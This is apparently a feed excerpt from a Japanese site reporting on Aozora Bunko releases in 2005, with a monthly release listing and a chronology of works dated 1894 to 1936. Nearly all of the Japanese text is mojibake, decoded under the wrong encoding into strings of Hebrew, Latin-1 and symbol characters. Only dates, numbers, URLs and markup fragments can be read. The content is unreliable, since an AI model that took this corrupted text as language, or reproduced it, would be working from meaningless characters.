₪ֻּכ₪¬₪¢₪±₪ֿ₪₪ל₪¿₪־₪ַ₪¢₪כ¡£₪µ₪¹₪¬₪ֻ²ײ²ַ₪ֿ₪×₪ֹ₪ם₪¯₪ט₪¦₪·־¨₪ֿ₪·₪₪«₪ֳ₪¿₪±₪ל₪ֹ¡¢₪₪¯₪ֶֿג¿´₪×₪ְ₪ה₪«₪ַ₪ֿ₪₪«₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪ג₪·₪ג°־ֲח₪₪כַמ»־₪ֿ₪₪ֱ₪¬₪¨₪ֶ₪₪«₪־¿ֽ₪ֻ·כ÷§₪ע¿½₪·₪³₪ף₪ַ₪₪₪כ₪־₪«₪ג₪·₪ל₪₪₪¡£₪½₪·₪ֶ₪½₪־₪ָ₪­₪ֹ₪ף₪ֳׁ₪ע₪«₪₪₪ֶ¡¢ֳֿµו°לּּ₪ֻ₪¢₪ן₪¿₪ְ₪·₪₪ְֹק₪ע₪₪­₪×₪³₪¹₪«₪ג₪·₪ל₪₪₪₪־₪ַ₪¢₪כ¡£₪₪¯₪ֿ²ײ²ַ₪ֻֽ‎ֽ³₪ע₪־₪¡¢¼«ֶ°¼ײ₪ע₪₪₪½₪¬₪»₪ֶ²¸»ױ₪־½ס÷״₪״₪«₪±₪ִ₪±₪¿¡£₪½₪·₪ֶ₪₪¯₪ֿ¿¼₪¯°ֲ¿´₪·₪¿₪־₪ַ₪¢₪כ¡£₪½₪־₪ָ₪­°־ֲח₪₪כַמ»־₪ְֿ¾ֶמֳ¼₪־ִ¹¥₪¥¹₪ֻ₪¦₪ג₪ל₪ֶֻ°¡₪¢¡ֻ₪¯₪³₪ָ₪₪¯°ל½ס₪ע₪א₪µ₪₪ךֶֹ₪ף₪ַ₪₪₪¿¡£₪½₪·₪ֶ¡¢÷£¡¢ֵלֳֻּ¼₪־₪ׂ₪¸₪«₪±¥₪¥¹₪«₪י°ֵ¾₪·₪¿₪׀₪«₪ך₪ֱֻך°ד₪₪₪¾µע₪ֻ₪ֿ¡¢°ל¿״₪־ֶֹֽק₪¬ֵלֻּ₪«₪יְ¾ֶמ₪ֻ₪«₪±₪ֶּ₪ֻ₪·₪₪ן₪¿₪כֲ¿₪¯₪־ּנ₪עֱֹ₪­₪₪¬₪יֱצ₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪¢₪כ¡£
    -¡ײְטְ¸ּףֲ«₪־»‏´ײ₪¬₪¹₪®₪₪·₪¿¡׳
    -¡¡₪₪¯₪ֿ₪₪כ₪₪¯°־ֲח₪₪כַמ»־₪ע₪×₪ֹ₪«₪µ₪₪₪₪ט₪¦₪ֻ¡¢₪ָ₪¯₪ְֵֻ½ֽ₪¥¡¼¥÷₪ע₪ָ₪ֳ₪ֶ¸‎¾ו₪ע₪־₪₪¿₪־₪ַ₪¢₪כ₪¬¡¢·כ²ּ₪ֻ₪×₪₪₪ֶ₪½₪ל₪ֿ°־ֲח₪₪כַמ»־₪ע₪×₪׃₪ה₪«₪¹₪ֻ₪¸₪ו₪¦₪ײ₪ף₪ַ₪¢₪ֳ₪¿¡£₪₪¼₪₪י°־ֲח₪₪כַמ»־₪ֿ¿§₪ֿ₪¢₪»₪ֶ₪₪₪¿₪±₪ל₪ֹ±םָרֹ‏₪ע¿ָ₪ֻ₪₪ָ₪₪¡¢₪½₪־₪¦₪¨₪ׂ₪¶₪¬₪·₪י₪ֻ₪ֿ¥·¥כ¥¯¥ֿ¥ֳ¥ָ₪ע₪־₪»₪ֶ¡¢₪¿₪₪₪״₪ף₪ך₪ֳ₪ׁ₪¥ֱ¥ו¡¼¥ך¥ֳ¥׳₪ע¶»₪־¥¥¿¥ף₪ֻ₪ֿ₪µ₪ף₪ַ₪₪₪¿₪«₪י₪ַ₪¢₪כ¡£₪ִ₪₪ך°־ֲח₪₪כַמ»־₪ֿ¿¼₪¯·כ÷§¼°₪ע´ֲװ₪·¡¢ֶ±»‏₪ֻ¿¼₪¯·כ÷§¼°₪ע¼÷ַ°₪·₪¿₪ֱֻך°ד₪₪₪₪₪₪ם₪₪₪ם₪־¾ע·ן₪עְּ¼¨₪·₪ֶ₪₪₪¿¡£
    -¡ײ£׀£ֿ£׀£ֿ£׀£ֿ¡×¡׳
    -¡¡°־ֲח₪₪כַמ»־₪ֿ¥·¥כ¥¯¥ֿ¥ֳ¥ָ₪ע₪«₪ײ₪ך₪₪×₪·₪¿₪־₪ַ₪¢₪כ¡£₪½₪·₪ֶ¿פֳֹ₪־´ײ₪¦₪¿₪¬₪ן₪·₪²₪ֻ₪₪¯₪־´י₪ע₪₪ִ₪ב₪ֶ₪₪₪¿₪¬¡¢₪ה₪¬₪ֶ¼÷ַ°₪·₪ֶ₪₪₪¿₪ג₪־₪ע₪¢₪ך₪¢₪ך₪ָ»׳₪₪₪ְ₪·₪¿¿¼₪₪´¶ֶ°₪¬₪¢₪י₪ן₪ל₪¿₪־₪ַ₪¢₪ֳ₪¿¡£
    -¡ײ£װ£ֱ£װ£ֱ£װ£ֱ£װ£ֱ£װ£ֱ£ָ¡×¡׳
    -¡¡₪¹₪ַ₪ֻ₪½₪־½ײ´ײ¡¢₪₪¯₪ֿ₪¹₪כ₪ֹ₪₪₪µ₪±₪׃ְ¼₪ע₪­₪₪₪¿₪־₪₪ַ¡¢°־ֲח₪₪כַמ»־₪־₪¹₪¬₪¿₪ֿ₪±₪ָ₪׀₪µ₪ל₪¿¥ָ¥׃¥י₪־₪א₪³₪¦ֲ¦₪ֻ¸«¼÷₪ֳ₪ֶ₪₪₪¿¡£₪₪¯₪ֿ₪׃₪ֳ₪¯₪ך₪·₪ְִֶֹ׳₪·₪¿₪־₪ַ₪¢₪כ¡£₪½₪·₪ֶ´סְ׳₪־₪×₪³₪ֳ₪¿₪־₪ֿ₪¹₪₪ן₪ֱ₪ֱ₪ח₪¦₪ֹ₪³₪־½ײ´ײ₪ַ₪¢₪ֳ₪¿¡£°־ֲח₪₪כַמ»־₪־₪¹₪¬₪¿₪ֿ₪ָ₪ִ₪¼₪ף¾ֳ₪¨₪¦₪»₪¿₪־₪ַ₪¢₪כ¡£
    -¡¡½פ·¯¡¢³«₪₪₪¿·ְֱ׳₪־₪₪₪¸ֽ¸‎₪«₪י¡¢¿ֽ´ײ₪ֿ₪¼₪ֳ₪¿₪₪₪ֻ½׀ֶ‏₪ך₪·₪¬₪¿₪₪₪ג₪־₪ַ₪¢₪כ¡£₪·₪¿₪¬₪ֳ₪ֶ°־ֲח₪₪כַמ»־₪ֿ³°₪״½׀₪₪«₪ֳ₪¿₪ֱֻך°ד₪₪₪₪־₪ַ₪¢₪כ¡£₪½₪·₪ֶ°־ֲח₪₪כַמ»־₪ֵֿ¡ֲנ₪־ֶגֹפ₪ֻ₪ג₪₪₪₪«₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪₪¯₪ֿ³¬ֳ₪־₪ָ₪ֱ₪ו₪¦₪ֻ¶ֵ½ּ₪·₪ֶ¡¢₪₪ְ¶ֱ₪­»ִ₪ֳ₪ֶ₪₪₪כ₪½₪־₪¢₪ן₪¿₪ְ₪·₪₪₪¢₪·₪×₪ָ₪ע¼×₪ֻ₪·₪₪¬₪י¡¢₪¿₪ְ°ל¿״₪־ֶֹֽק₪¬³¬ֳ₪־²¼₪ֹֻס₪₪¶¸₪¦₪־₪ע¸«₪¿₪־₪₪ַ₪¢₪ֳ₪¿¡£
    -¡¡½פ·¯¡¢°־ֲח₪₪כַמ»־₪ֹֿק₪ָ₪₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪ֿ₪¿₪·₪ֶֹק₪ָ₪₪ֳ₪¿₪«¡©¡¡₪·₪«₪ך¡¢ֹק₪ָ₪₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪₪ף₪ָ₪₪ל₪׀₪½₪־₪¹₪¬₪¿₪¬¾ֳ₪¨₪¦₪»₪¿₪ַ₪ֿ₪₪₪₪«¡£₪¹₪¬₪¿¸«₪¨₪¶₪כ₪ַֿ·₪¹₪₪ן₪ֱֹק₪ַ₪¢₪כ₪«¡©¡¡₪·₪«₪ך¡¢ַ·₪¹₪₪ן₪ֱֹק₪ַ₪¢₪כ¡£₪₪ף₪ָ₪₪ל₪׀»ׁ₪¬¸«₪¨₪₪₪₪ַ₪ֿ₪₪₪₪«¡£₪³₪לֹק°³°₪־₪₪ֻ₪ג₪־₪ַ₪ג₪¢₪ך₪¨₪₪₪¡£ֹק₪ַ₪¢₪כ¡£₪·₪«₪ךֹק₪ַ₪¢₪כֹק₪ַ₪¢₪כֹק₪ַ₪¢₪כ¡£½פ»ב₪ֿ₪₪ס¢₪³₪־ְַּע₪₪כ»צ¼ֲ₪ע₪¦₪¿₪°₪כ₪־₪ַ₪¢₪ם₪¦₪«¡£₪½₪ל₪ֿ₪¿₪₪₪״₪ף»ִַ°₪ַ₪¢₪כ¡£₪½₪ל₪ַ₪ֿ₪₪¯₪ֿ¡¢₪µ₪י₪ֻ₪¦₪´₪«₪¹₪₪«₪י₪¶₪כ²³״ֵ×÷¬µע₪ע₪ִ₪±₪¯₪ן₪¨₪ט₪¦¡£₪³₪־ֶ¡¢₪«₪־ֱ‏₪א₪₪­¥¿¥³ַמ»־₪ֿ¡¢₪¢₪¿₪«₪ג₪³₪־₪×₪₪¸½ײ´ײ₪ֻ₪×₪₪₪ֶ¡¢¥₪¥ף¥ױ¥כ¥¨¥ף¥¶₪ָָֻ₪µ₪ל₪¿₪־₪ַ₪¢₪כ¡£
    -¡¡
    -¡¡
    -¡¡
    -ִלֻ¡§¡ײ÷ה¸‎°ֲ¸דֱ´½¸1¡׳₪ֱ₪¯₪¸¸ֻ¡¢ֳֻא½סֻ¼
    -¡¡¡¡¡¡1989¡¿ְ®¸µ¡ַֻ¯12·מ4ֲֶט1÷‏ָ¯¹װ
    -¡¡¡¡¡¡1989¡¿ְ®¸µ¡ַֻ¯12·מ25ֲֶט2÷‏ָ¯¹װ
    -ִלֻ₪־¿ֶֻ¡§¡ײ¹ץֳ«ֲ¼¡׳ֲֳ¼½סֻ¼
    -¡¡¡¡¡¡1935¡¾¼ֲֿ10¡ַֻ¯6·מ25ֶָ¯¹װ
    -½י½׀¡§¡ײ₪¢₪×₪₪ַֿ¡¡ֲטֶף¹ז¡׳´הַָ½סֵ¹
    -¡¡¡¡¡¡1931¡¾¼ֲֿ6¡ַֻ¯6·מ1ֶָ¯¹װ
    -ֶ‏־ֿ¡§÷½¾לְ¶־´
    -¹»ְµ¡§°ֶֻ£»‏ּי
    -2005ַ¯11·מ19ֶ÷מְ®
    -ְִ¶ץ¸¸ֻ÷מְ®¥ױ¥¡¥₪¥כ¡§
    -₪³₪־¥ױ¥¡¥₪¥כ₪ֿ¡¢¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪־¿½ס´¡¢ְִ¶ץ¸¸ֻ¡http://www.aozora.gr.jp/¡ֻ₪ַ÷מ₪י₪ל₪₪·₪¿¡£ֶ‏־ֿ¡¢¹»ְµ¡¢ְ©÷מ₪ֻ₪¢₪¿₪ֳ₪¿₪־₪ֿ¡¢¥¥י¥ף¥ֶ¥£¥¢₪־₪₪₪µ₪ף₪ַ₪¹¡£

    ]]> -
    -book -PoorBook G3'99 -2006-01-03T12:32:32+09:00 -
    - -¶ץ¿§ִּ¿®¡¡£²£°£°£µַ¯£±£²·מ¹ז -http://www.siesta.co.jp/aozora/archives/002459.html - -£²£°£°£µַ¯£±£²·מ₪ֿ¡¢£³£¹÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£¼ח₪¥ֻ¥ו¡¼¥¹₪ָ₪·₪ֶ₪ֿ¡¢£µ£°£°£°÷מֵֹ‏ֳ£₪ָ₪₪כ₪ְ₪ם₪¦¡£
    -

    ]]> -¡¼ח₪¥ֻ¥ו¡¼¥¹¡
    -£±£²·מ£³£±ֶ¸ר³«₪־¿־²ֻ§ֽ÷¡ײ¥ז¥ֽ¥¹¥³₪ָ²³״¡׳₪ע₪ג₪ֳ₪ֶ¡¢¸ר³«÷מֹ₪¬£µ£°£°£°÷מֹ₪ֵֻ‏ֳ£₪·₪¿¡£ֽטַ¯₪ֿ£¶£°£°£°₪ֻ₪גֵ‏ֳ£₪¹₪כ₪«₪ג₪·₪ל₪₪₪¡£

    - -

    ¡¸ר³«÷מֹ¡
    -¡¡£²£°£°£µַ¯£±£²·מ₪ֻ₪ֿ¡¢£³£¹÷מֹ₪־¥ױ¥¡¥₪¥כ₪¬¸ר³«₪µ₪ל₪¿¡£₪₪ס¢÷מֹּ₪¸ר³«₪־₪¿₪בµ¡ַ½₪·₪₪₪¥ך¥ף¥¯₪¬°לֹפ₪¢₪כ¡£

    - -

    ¡¡₪ג₪ֳ₪ָ₪גֲ¿₪¯₪־÷מֹ₪¬¸ר³«₪µ₪ל₪¿₪־₪ֿ³₪ּמ½½»°₪ַ¡¢£¹÷מֹ¡°ֵ¹ז¿פ»ת¡¢ר₪ל₪כµ´±ֶ¡¢₪ג₪¯₪ֽ₪¸¡¢ְִֻ׳ֳֻ¡¢ְֲ¿ֽ־ֽכ·גְןֲג¡¢¶ץ½±²¼₪־ֶֻ¡¢א׃ףְ¡¢²׀ֱע¹סֹק·¡¢·מְ₪³¦ֳµ¸±µ­¡ֻ¡£ְן»‏²¼₪־ְ₪ֱך₪עָ¿±ַ₪·₪¿÷מֹ₪¬ֲ¿₪₪¡£ַּּע₪₪₪ָ»׳₪¦₪־₪ֿ¡ײְִֻ׳ֳֻ¡׳¡£¾ט₪כֱ¥₪¬¡¢₪³₪ָ₪´₪ָ₪¯ְִֻ׳₪¹₪כֳֻ₪־ֵ¿ֻצ₪ה¡¢ַ¡²¿₪ֻ¡£

    - -

    ¡¡¼¡₪ֲֻ¿₪₪₪־₪¬´ִֵ¹ס»־₪ַ¡¢£·÷מֹ¡¸ְ₪ֿ₪ַ₪ג₪־₪³₪ָ¡¢·½ׁ÷ֲ₪־¡״·³¿ֽ־י»¾¡¡¢¥ֱ¥ם¥כ₪־־¹¡¢¸ְֽױ¸ְֽױ¸ְֽױ¡¢¾ו±י־ֱ₪־ֳֿ¡©ֽצְ¾¡ֻ¡¢¡ײ¸ֳֵֶַָ°ִ´¡׳ֽףµ­»צ 01 ¡₪½₪־°ל¡ֻ¡¢½½ֶף·מֵ×´¶ֱ¡ֻ¸ר³«₪µ₪ל₪¿¡£°ל׃₪ע½₪­¡¢¡ײ´ִֵ¹ס»־ֱ´½¸19¡׳ִלֻ₪־¿ןֹ®₪ַ₪¢₪ך¡¢ֲחְµ´₪ֻ½ס₪«₪ל₪ֶ₪₪₪כ¡£¡ײ¥ֱ¥ם¥כ₪־־¹¡׳₪ה¡ײ³₪₪־ֽ¶ַֿ¡׳₪₪ֹ₪־»¨»ן¡ײ½קְ­¡׳ִלֻ₪־÷מֹ₪ֿ¿ןֹ®₪ָ¸ֶ₪₪כ₪־₪«₪ֹ₪¦₪«¡¢ֹװ»׳µִ₪÷מֹ₪ַ₪¢₪כ¡£

    - -

    ¡¡ֻּץ₪¬£²׃¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡¥¢¥ף¥ַ¥כ¥»¥ף¡ײְד₪־½ק²¦¡׳₪ָ¥ְ¥ף¥ֶ¡ײ¿ְ¶ 03 ֵ·ֶ²¡׳¡ֻ¡£¡ײְד₪־½ק²¦¡׳₪ֿ¥¯¥ך¥¹¥¥¹₪ֻ¸ר³«₪µ₪ל₪¿¡£¥ְ¥ף¥ֶ¡ײ¿ְ¶¡׳₪ֿ₪³₪ל₪ַ¡¢»°ֹפ÷מֱ´₪ֶ¸ר³«₪ָ₪₪ֳ₪¿¡¡ײ01 ֳֿ¹צ¡׳¡¢¡ײ02 ¾פ²׀¡׳¡¢¡ײ03 ֵ·ֶ²¡׳¡ֻ¡£

    - -

    ¡¡²³״¼װ¡¢¿־²ֻ§ֽ÷₪־÷מֹ₪¬½יֵ׀ֿ¿¡³פ¼°²ס¼ׂ²³״¸¦µז½ך₪־»ָּ¿ ¡¢ֶֻ÷ֶ·ת₪ָ²³״¡¢¹ס÷³״½ׁ²סµִ₪״₪־־¹¡¢¹סּ±₪־¿ֽ³¸‏¾ו₪ָ²³״µ»½ׁ ¡¢¥ז¥ֽ¥¹¥³₪ָ²³״¡ֻ¡£÷£ַ¯ֻצ₪ע¾‏₪כ¡ײ¥ז¥ֽ¥¹¥³₪ָ²³״¡׳₪ֿ¡¢²³״µ»½ׁ₪־ֽרֽׁ₪ֲֻ׀₪¹₪כ´ֶ»כ₪־₪¿₪ב₪־¹ס÷¶¨־ֿ₪ֻ₪ִ₪₪₪ֶ₪־ִף¸ְ₪ַ₪¢₪כ¡£²³״µ»½ׁ₪־ְ§ָף₪ֻ₪ִ₪₪₪ֶ¡¢¹ֽ₪¨₪µ₪»₪י₪ל₪כ¸¾ֿ₪ַ₪¢₪כ¡£

    - -

    ¡¡¿הֽ‎¾®ְג₪ֿ¡¢¾®¼ע°זֹװּ₪¬£³׃¡¿¼ּכ₪־ֳֵֵֿ¡¢ֳװ¿ֽ₪־ֹ½²¡¢ֶ®ֱט¡ֻ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£ֲח½°¸³״₪ַ₪ֿ¡¢¹ס»»ֻֿ÷₪־¾¯₪·ֳ»₪₪ִ¹װ¡ײ·לׂ״ֲֻֽו»זִ¢ֹנ»־¡׳₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡ְפ¶ְ²ײ₪ֿ¡¢ְּ¼£´₪־÷מֹ£²׃₪¬¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡¼כֶµ­¡¢ֵֽ½ׁ¡ֻ¡£¡ײ¼כֶµ­¡׳₪־¡ײְײ₪₪±מ¡¢ְײ₪₪´ת₪¡¢ְײ¹ח±©₪עֳו₪¿¹ץֻ·¼ח¡׳₪ָ₪₪₪¦¥₪¥ב¡¼¥¸₪ְֿ¨₪₪₪ָ»׳₪¦¡ֲ¾₪ֻ₪גֲךּ¾₪־ִּ₪ך₪ֻ¡ײ¼כ¡׳₪ע¥ג¥ֱ¡¼¥ױ₪ֻ₪·₪¿₪ג₪־₪¬₪₪₪ֳ₪ׁ₪₪ֵ׀¾ל₪¹₪כ¡ֻ¡£

    - -

    ¡¡ֲ¾₪ֻ₪ֿ³ק¸¶ֽ­ְּ₪¬£³÷מֹ¡¶¸¸ְו÷¸ל¡¢µץּׁ₪ָ¿¿¼ֲ¡¢ִ¹ֳ«ְמֶףֽױִג¡ֻ¡¢ֽ­ֵח ֹנֿ÷₪¬£²÷מֹ¡ִ¬ּ¸¡¢¸¸ֱ¡ֻ¡¢ְֲ÷ֻ¼£₪¬£²÷מֹ¡¿·ֿ÷¡¢ֿ»·מ½½¶וֶ¡ֻ¡¢ֶמ‎·§ֶן₪¬£±÷מֹ¡½½ֶף»¹ֽ 04¡¡¼״₪ֻ´״₪¹₪כּ±ֲ¯₪ְֱֵָג¡ֻ¡¢ְ׀ְמ ֲןּ₪¬£±÷מֹ¡²זֵש₪־°לֳִ₪ָָא¡ֻ¡¢¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ¡¡÷ַ¸ו₪ֻ₪₪ך₪₪·₪¿₪¬¡¢ֶ‏־ֿ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹¡¢¹»ְµ₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿‎¡¹₪ֻ´¶¼ױ₪₪₪¿₪·₪₪¹¡£₪₪¿¡¢₪₪₪µ₪ף₪־₪×µ₪₪ֶֻ‏₪ך₪ע¡¢¥³¥ב¥ף¥ָֽף₪ַ¾ׂ²נ₪·₪ֶ₪ג₪י₪¨₪כ₪ָ¡¢₪¦₪ל₪·₪₪₪ַ₪¹¡£

    - -

    ¡¡¥׀¥ֳ¥¯¥¥ף¥׀¡¼₪ֿ¡¢₪³₪ֱ₪י¡£

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-31T04:53:12+09:00 -
    - -¡ײ¶ץ¿§ִּ¿®¡׳¿·ֳוµ­»צ -http://www.siesta.co.jp/aozora/archives/002422.html - -¶ץ¿§ִּ¿®₪ע¹¹¿·₪·₪₪·₪¿¡£
    -£²£°£°£µַ¯£±£²·מ¹ז₪עִֹ²ֳ₪·₪₪·₪¿¡£
    -

    ]]> -¶ץ¿§ִּ¿®¥׀¥ֳ¥¯¥¥ף¥׀¡¼
    -£²£°£°£µַ¯£±£²·מ¹ז
    -£²£°£°£µַ¯£±£±·מ¹ז
    -£²£°£°£µַ¯£±£°·מ¹ז
    -£²£°£°£µַ¯£¹·מ¹ז
    -£²£°£°£µַ¯£¸·מ¹ז
    -£²£°£°£µַ¯£··מ¹ז
    -£²£°£°£µַ¯£¶·מ¹ז

    - -

    ¡ײ¶ץ¿§ִּ¿®¡׳³«»ֿ₪־¹נֳ־
    -

    ]]> -
    -book -ּחִֵֽµ»ײ -2005-12-31T04:24:22+09:00 -
    - -ְפ¶ְ²ײ÷מָֹ¯ֹ½ַ¯ֲו½ח¥ך¥¹¥ָ -http://www.siesta.co.jp/aozora/archives/002458.html - -£²£°£°£µַ¯£±£²·מ£²£¹ֶ¸½÷¡¢ְפ¶ְ²ײ÷מֹ₪ֿ£·£¸÷מֹ¸ר³«₪µ₪ל₪ֶ₪₪₪כ¡£ֱ´װ₪־ֶגֶֽ₪־¾ׂ²נ₪ע½ס₪¯₪־₪ֲֿחׁ₪₪־₪ַ¡¢ָ¯ֹ½ַ¯ֲוּ₪־¥ך¥ף¥¯½¸₪ע÷מ₪ֳ₪ֶ₪₪¿¡£¾®ְג₪ג¾®ֹ₪גµ÷¶₪ג₪ׂ₪ָ₪₪ָ₪ב₪ֻ₪·₪ֶ₪¢₪כ¡£ָ¯ֹ½ַ¯ֲו₪´₪ָ₪ֻ₪₪ָ₪ב₪כ₪ָ¡¢°ױ³°₪÷מֹ₪¬ֶ±»‏´₪ָֻ¯ֹ½₪µ₪ל₪ֶ₪₪₪כ₪³₪ָ₪¬₪ן₪«₪כ₪«₪ג₪·₪ל₪₪₪¡£
    -

    ]]> -¶ְ²ײ₪ְּֿ¼£´¡ְּ¼£26ַ¯₪«₪יְּ¼£43ַ¯¡ֻ₪ֻּף£±£·£°׃¡¢ֲחְµ´¡ֲחְµ¸µַ¯₪«₪יֲחְµ14ַ¯¡ֻ₪ֻּף£±£°£°׃¡¢¾¼ֲֿ´¡¾¼ֲֿ¸µַ¯₪«₪י¾¼ֲֿ14ַ¯¡ֻ₪ֻּף£²£°׃₪־¾®ְג₪עָ¯ֹ½₪·₪ֶ₪₪₪כ¡£ְִ¶ץ¸¸ֻ₪ַ₪ֿ¡¢¾®ְג°³°₪ג₪₪₪ם₪₪₪ם₪ָ¸ר³«₪·₪ֶ₪₪₪כ₪־₪ַ¡¢₪½₪ל₪ג¹ח₪ן₪»₪ֶָ¯ֹ½ַ¯ֲוּ₪ֻ¥ך¥ף¥¯₪ע₪ֿ₪ֳ₪ֶ₪₪¿¡£

    - -

    1894¡ְּ¼£27¡ַֻ¯
    -¡¡¡ײµֱ·ל¶¢·ל¡׳

    - -

    1895¡ְּ¼£28¡ַֻ¯
    -¡¡¡ײ°¦₪ָ÷§°ש¡׳¡ײ¿ְ³÷ה¼·ֹװ»׳µִ¡׳¡ײ³°²¼¼¡׳¡ײ½¹ֹ״₪עׂך₪¹¡׳¡ײ־¹ֱ־¡׳¡ײּכ¹װ½ה÷÷¡׳

    - -

    1896¡ְּ¼£29¡ַֻ¯
    -¡¡¡ײ»חֽ²ײ¡׳¡ײ³₪¾כָ¯ֵֵ¡׳¡ײ³®ְ÷׳¡׳¡ײ־µ¬כ‎¡׳

    - -

    1897¡ְּ¼£30¡ַֻ¯
    -¡¡¡ײ²½ִ»¡¿·»ת¿·²¾ּ¾¡ֻ¡׳¡ײ²½ִ»¡¿·»תµל²¾ּ¾¡ֻ¡׳¡ײֵ´ִָ₪־²»¡׳¡ײֲּ»ׂ¡׳

    - -

    1898¡ְּ¼£31¡ַֻ¯
    -¡¡¡ײ¾®ְג¸ֲ־¡׳¡ײ¼״₪¯₪ׂ¡׳¡ײְ±₪¢₪«₪ך¡׳

    - -

    1899¡ְּ¼£32¡ַֻ¯
    -¡¡¡ײ¹ץֹ´¹ח¡׳¡ײ»°¼³ׁ¡׳¡ײּן¼¡¹װ¡׳

    - -

    1900¡ְּ¼£33¡ַֻ¯
    -¡¡¡ײ¹גּמְ»¡׳

    - -

    1901¡ְּ¼£34¡ַֻ¯
    -¡¡¡ײ₪₪₪ם°·₪ׂ¡׳¡ײ»°¼³ׁ½¦°ה ¡ְּ÷¡ֻ¡׳¡ײ¿¹₪־»חֽ²ײ¡׳¡ײְד₪־ֽד¡׳

    - -

    1902¡ְּ¼£35¡ַֻ¯
    -¡¡¡ײ¿א»ׂ₪ְ₪ט₪ך¡׳¡ײ»³₪־¼ך¾®·¡׳¡ײֱֵֽ־µ­¡׳

    - -

    1903¡ְּ¼£36¡ַֻ¯
    -¡¡¡ײֱנ₪¢₪ה₪ב¡׳¡ײּפֱנ¼ט¡׳

    - -

    1904¡ְּ¼£37¡ַֻ¯

    - -

    1905¡ְּ¼£38¡ַֻ¯
    -¡¡¡ײ½קµׂ¡׳

    - -

    1906¡ְּ¼£39¡ַֻ¯
    -¡¡¡ײ¿א»ׂ₪ט₪ך¡׳

    - -

    1907¡ְּ¼£40¡ַֻ¯
    -¡¡¡ײ±ן·כ₪׃¡׳¡ײֹ״·ֿ¿¡׳

    - -

    1908¡ְּ¼£41¡ַֻ¯
    -¡¡¡ײֱנֲּµ¡׳

    - -

    1909¡ְּ¼£42¡ַֻ¯
    -¡¡¡ײ¾®ְג₪ֻֽׁ₪ױ₪כֵ·ֱ³¡׳

    - -

    1910¡ְּ¼£43¡ַֻ¯
    -¡¡¡ײ²־¹װֵפ¡׳¡ײ₪ײײ¸«»¨´¶¡׳¡ײ¹סִח₪¨₪¬₪¯¡׳¡ײ÷מ×₪־ֽׁ°ױ¡׳¡ײ¼כֶµ­¡׳¡ײֵֽ½ׁ¡׳

    - -

    1911¡ְּ¼£44¡ַֻ¯

    - -

    1912¡ְּ¼£45¡¿ֲחְµ¸µ¡ַֻ¯
    -¡¡¡ײַע₪₪²¼ֳֿ¡׳

    - -

    1913¡ֲחְµ2¡ַֻ¯
    -¡¡¡ײ¹ָ¶ּ¡׳¡ײּכ÷µ¥צֳ׃¡׳

    - -

    1914¡ֲחְµ3¡ַֻ¯
    -¡¡¡ײֵעֵח₪־¶­ֶג¡׳

    - -

    1915¡ֲחְµ4¡ַֻ¯
    -¡¡¡ײ¾¾¿י¿¼₪¯ֱףֿ²ֽ₪±₪­¿א»ׂ₪ט₪ך¡׳

    - -

    1916¡ֲחְµ5¡ַֻ¯
    -¡¡¡ײ¿ֽµ₪־ד¬¡׳¡ײ¶׃ְקֲלַע»ו¡׳

    - -

    1917¡ֲחְµ6¡ַֻ¯
    -¡¡¡ײ¿ק₪¬₪¿₪ך¡׳

    - -

    1918¡ֲחְµ7¡ַֻ¯

    - -

    1919¡ֲחְµ8¡ַֻ¯

    - -

    1920¡ֲחְµ9¡ַֻ¯
    -¡¡¡ײ·מ־ב½½ֶףֲײ¡׳¡ײְ£¾נֹקֵµ­¡׳¡ײַה¿§³ֶמָ¡׳¡ײַל¼₪־מא¡׳

    - -

    1921¡ֲחְµ10¡ַֻ¯
    -¡¡¡ײ¼·ץ₪־ֳל¡׳¡ײְד־מµ­»צ¡¿·»ת¿·²¾ּ¾¡ֻ¡׳¡ײְד־מµ­»צ¡µל»תµל²¾ּ¾¡ֻ¡׳¡ײְד־מֲ³µ­¡¿·»ת¿·²¾ּ¾¡ֻ¡׳¡ײְד־מֲ³µ­¡µל»תµל²¾ּ¾¡ֻ¡׳

    - -

    1922¡ֲחְµ11¡ַֻ¯

    - -

    1923¡ֲחְµ12¡ַֻ¯
    -¡¡¡ײף½¼ם¡׳¡ײ₪₪µ₪´₪־ע¿¡׳

    - -

    1924¡ֲחְµ13¡ַֻ¯
    -¡¡¡ײ¾®½ױ₪־¸ׁ¡׳¡ײ¶ְּמ₪־ֱנ¡׳¡ײֶ₪־¼ֲ¡׳¡ײֶף¡¢»°±©¡½¡½½½ֶף¡¢»°±©¡׳¡ײָ‎₪«₪¯₪·₪־־מ¡׳

    - -

    1925¡ֲחְµ14¡ַֻ¯
    -¡¡¡ײ±ו־מ¼ֽׁ¡׳

    - -

    1926¡ֲחְµ15¡¿¾¼ֲֿ¸µ¡ַֻ¯
    -¡¡¡ײ³¨ֻ₪־½ױ¡׳¡ײ¾כ÷ך₪ע²±₪ױ¡׳¡ײָ¾ֵח°ל´ס¾¶¡׳

    - -

    1927¡¾¼ֲֿ2¡ַֻ¯
    -¡¡¡ײ³©ְמ־µַ·²נ»ב₪עִ₪₪ױ¡׳

    - -

    1928¡¾¼ֲֿ3¡ַֻ¯

    - -

    1929¡¾¼ֲֿ4¡ַֻ¯

    - -

    1930¡¾¼ֲֿ5¡ַֻ¯
    -¡¡¡ײּ₪־»ְׂגֻ¡¡׳

    - -

    1931¡¾¼ֲֿ6¡ַֻ¯
    -¡¡¡ײ³­₪־·ך₪ֻ²ֶֿ¸₪־µן₪כ»צ¡׳¡ײ¸ֵאֲ¡׳

    - -

    1932¡¾¼ֲֿ7¡ַֻ¯

    - -

    1933¡¾¼ֲֿ8¡ַֻ¯
    -¡¡¡ײ¼ד÷₪־₪¦₪ֱ¡׳

    - -

    1934¡¾¼ֲֿ9¡ַֻ¯

    - -

    1935¡¾¼ֲֿ10¡ַֻ¯

    - -

    1936¡¾¼ֲֿ11¡ַֻ¯

    - -

